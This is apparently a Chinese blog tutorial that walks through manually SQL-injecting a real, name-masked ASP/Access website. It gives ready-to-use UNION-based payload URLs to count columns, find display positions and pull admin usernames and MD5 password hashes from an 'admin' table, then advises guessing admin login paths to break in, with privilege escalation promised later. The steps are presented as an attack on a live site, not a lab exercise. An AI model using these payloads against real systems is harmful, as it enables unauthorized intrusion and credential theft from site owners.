【实战】利用联合查询--手工SQL注入拿下网站

        看到不少脚本小子，工具党用啊D，明小子，穿山甲对网站扫来扫去，拿个后台什么的，其实基础是最重要的，今天我来讲一下纯手工注入一个站点。

 

目标网址:http://www.******.com/about.asp?id=1

 

1.首先确认这里是否存在整型注入，很简单，url后加' and 1=1 and 1=2,不细说。同时咱们还判断出这是Access的数据库。

 

2.利用order by判断表项有几个；

    http://www.******.com/about.asp?id=1 order by 4（这里的5报错，4正确，就是4个了）

 

3.而后测试显示位，2，3位可显；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

 

4.在显示位猜想字段值；这里的表名，字段名根据经验来试；常见的就那几种；咱们获得了用户名和密码（MD5加密的）；

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

 

5.拿到用户名密码后，寻找后台，常见的admin/login/manager/admin_login等能够试一试，成功登录，搞定。提权后面再说咯。